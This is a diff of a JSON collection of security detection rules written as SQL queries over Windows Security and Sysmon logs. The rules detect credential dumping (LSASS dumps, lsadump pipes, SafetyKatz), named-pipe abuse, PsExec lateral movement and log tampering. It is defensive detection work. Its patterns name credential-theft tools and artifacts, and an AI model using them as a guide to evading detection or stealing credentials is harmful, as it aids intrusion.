"title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' 
ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, 
oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName 
REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of 
Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE 
'%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' 
ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz 
Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that 
windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((EventID 
= '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND 
